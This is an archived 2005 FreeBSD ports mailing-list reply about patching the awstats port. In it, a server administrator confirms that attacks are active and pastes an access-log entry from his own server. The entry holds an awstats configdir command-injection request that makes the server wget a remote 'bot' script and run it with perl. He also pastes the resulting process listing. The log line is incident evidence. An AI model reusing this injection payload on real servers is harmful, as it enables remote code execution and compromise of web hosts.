Date: Wed, 26 Jan 2005 19:53:21 -0800 From: Charlie Schluting <charlie@schluting.com> To: ports@freebsd.org Subject: Re: FreeBSD Port: awstats-6.2 Message-ID: <41F865B1.1030901@schluting.com> In-Reply-To: <20050127012022.GD18600@hal9000.halplant.com> References: <41F00880.2050506@covad.net> <41F71C20.4080002@covad.net> <790a9fff05012608282ceb53b2@mail.gmail.com> <20050127012022.GD18600@hal9000.halplant.com>
next in thread | previous in thread | raw e-mail | index | archive | help
On 1/26/2005 5:20 PM, Andrew J Caines wrote: > FWIW, I think the original patch posted was lacking some changes in the > pkg-plist which may or may not have been in the 6.2 update, when various > bit moved around and the installed files changed. > > I've made another[1] for the 6.3 port[2]. This 6.3 port builds, installs, > runs[3] and deinstalls cleanly. It doesn't specifically address any .jar > install or other issues. Indeed, the patch works (had to manually grab the tarball). FWIW, yes, exploits are definitely in the wild. I grepped my logs for "wget" and saw one (successful) attempt: /var/log/httpd-access.log:66.235.209.85 - - [26/Jan/2005:17:43:22 -0800] "GET /awstats/awstats.pl?configdir=%20%7Cecho%20;echo%20;cd%20/var/tmp;wget%20www.theplaza.co.uk/media/bot%20-O%20bot22;perl%20bot22;rm%20-f%20bot*;echo%20;echo%20%7C%20 HTTP/1.1" 200 588 "-" "LWP::Simple/5.65" If you look at the code on: http://www.theplaza.co.uk/media/bot you'll see that it tries to start: www 29943 101.6 0.5 4236 3504 ?? R 5:38PM 113:06.70 /usr/local/apache/bin/httpd -DSS1 (perl) Fuckers :( Thanks for the patch! -Charlie
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?41F865B1.1030901>